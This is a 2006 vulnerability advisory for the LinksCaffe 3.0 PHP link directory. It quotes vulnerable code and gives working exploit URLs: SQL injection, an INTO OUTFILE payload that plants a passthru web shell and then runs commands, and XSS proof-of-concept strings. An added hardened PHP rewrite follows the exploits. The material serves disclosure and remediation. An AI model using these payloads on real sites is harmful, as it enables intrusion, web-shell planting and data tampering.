
From: simo64_(at)_gmail.com <simo64_(at)_gmail.com>
Date: 26 July 2006
Subject: LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilities

LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilities

Product       : LinksCaffe 3.0
Website       : http://gonafish.com/
Impact        : manipulation of data / system access
Discovered by : Simo64 - Moroccan Security Team

[+] SQL injection
******************

 [1]   Vulnerable code at line 223 of links.php

       code :

       $rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());

       The $offset and $limit variables are not sanitized before being used in the query, so they can be used to conduct SQL injection attacks.

       Exploit :

       http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]
       http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]
 
 [2]   Vulnerable code at line 516 of links.php
 
 code :

       if (!$newdays)
       {
       $newdays=$daysnew;
       }
       else
       {
       $newdays=$newdays;
       }
       
       $rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error());
                       
       Exploit :
       http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]
       
       
 [3]   Vulnerable code at line 516 of links.php
 
 code :
 
 if ($action=="deadlink")
       {
       ........
       $rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());
       while($row = mysql_fetch_array($rime)) {
       extract($row);
       echo "<li><font class=text10><a href='$link_url' target='_blank'>$link_name</a><br>$link_desc<br></font></li>";
       echo "<input type = 'hidden' name = 'link_id' value='$link_id'><input type = 'hidden' name = 'cat_id' value='$cat_id'><input type = 'hidden' name = 'link_name' value='$link_name'>
       <input type = 'hidden' name = 'link_url' value='$link_url'><input type = 'hidden' name = 'link_desc' value='$link_desc'><input type = 'hidden' name = 'link_email' value='$link_email'><br><input type = 'submit' value = 'Dead Link'>";
       }
       
       The $link_id variable is not sanitized before being used in the query, so it can be used to conduct SQL injection attacks.
       
       Exploit :
       
       http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]
       
[+] Full path disclosure
************************

PoC :

       http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*
       
       Result :
       
       Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 540

       Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 549

       Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 554
       
[+] Remote Command Execution
*****************************
       
If magic_quotes_gpc == OFF, we can create a shell in a writable folder using (3)!!

Exploit :
       
http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,'<?passthru(\$_GET[\'cmd\']);?>',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*
       
Afterwards we can execute commands:
       
http://localhost/linkscaffe/pipo.php?cmd=ls;id



[+] Cross Site Scripting
*************************

The $tablewidth variable in counter.php is not sanitized before being output, so it can be used to conduct XSS attacks.
The $newdays variable in links.php is not sanitized before being output, so it can be used to conduct XSS attacks.
The $tableborder, $menucolor, $textcolor and $bodycolor variables in links.php are not sanitized before being output, so they can be used to conduct XSS attacks.

PoC :

http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+

http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]

http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]

http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]
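The fix for the SQL injection issues in [1]-[3] and the XSS issues above is the same in each case: validate and bind the numeric parameters instead of interpolating them, and escape every value before it is echoed into HTML. The following is an added example (not LinksCaffe's code) showing hardened forms of the three links.php queries; it assumes $db is an open mysqli connection with mysqlnd (for get_result()), and takes column and parameter names from the advisory.

```php
<?php
// Added example (not LinksCaffe code): hardened forms of the three links.php
// queries from the advisory. $db is assumed to be an open mysqli connection
// (mysqlnd, for get_result()); column and parameter names follow the advisory.
// Numeric parameters are accepted only as non-negative integers; anything
// else is rejected instead of being spliced into the SQL string.
function intParam(array $src, string $name, int $default): int {
    if (!isset($src[$name])) {
        return $default;
    }
    if (!ctype_digit((string) $src[$name])) {
        http_response_code(400);
        exit('invalid parameter: ' . $name);
    }
    return (int) $src[$name];
}

$cat     = intParam($_GET, 'cat', 1);
$offset  = intParam($_GET, 'offset', 0);
$limit   = min(intParam($_GET, 'limit', 20), 100); // cap the page size
$newdays = intParam($_GET, 'newdays', 7);
$link_id = intParam($_GET, 'link_id', 0);

// [1] Category listing: LIMIT offset/count are bound, never interpolated.
$stmt = $db->prepare("SELECT * FROM links WHERE link_val = 'yes' AND cat_id = ? "
                   . "ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT ?, ?");
$stmt->bind_param('iii', $cat, $offset, $limit);
$stmt->execute();
$links = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);

// [2] "New links" count with a bound day window.
$stmt = $db->prepare("SELECT COUNT(*) AS n FROM links WHERE "
                   . "(TO_DAYS(NOW()) - TO_DAYS(links.date)) <= ? AND link_val = 'yes'");
$stmt->bind_param('i', $newdays);
$stmt->execute();
$newCount = (int) $stmt->get_result()->fetch_assoc()['n'];

// [3] Dead-link form: bound link_id, no extract(), and every value escaped
// before it is echoed into HTML (the same fix applies to the XSS parameters).
$stmt = $db->prepare("SELECT link_id, link_url, link_name FROM links WHERE link_id = ?");
$stmt->bind_param('i', $link_id);
$stmt->execute();
$res = $stmt->get_result();
while ($row = $res->fetch_assoc()) {
    $url  = htmlspecialchars($row['link_url'], ENT_QUOTES, 'UTF-8');
    $name = htmlspecialchars($row['link_name'], ENT_QUOTES, 'UTF-8');
    echo "<li><a href='$url' target='_blank'>$name</a></li>";
    echo "<input type='hidden' name='link_id' value='" . (int) $row['link_id'] . "'>";
}
```

With the parameters bound as integers, the UNION/INTO OUTFILE payloads in this advisory are rejected with a 400 before any query runs, and the escaped output closes the XSS vectors regardless of the magic_quotes_gpc setting.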



Contact : [email protected]

greetz to all friends !

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod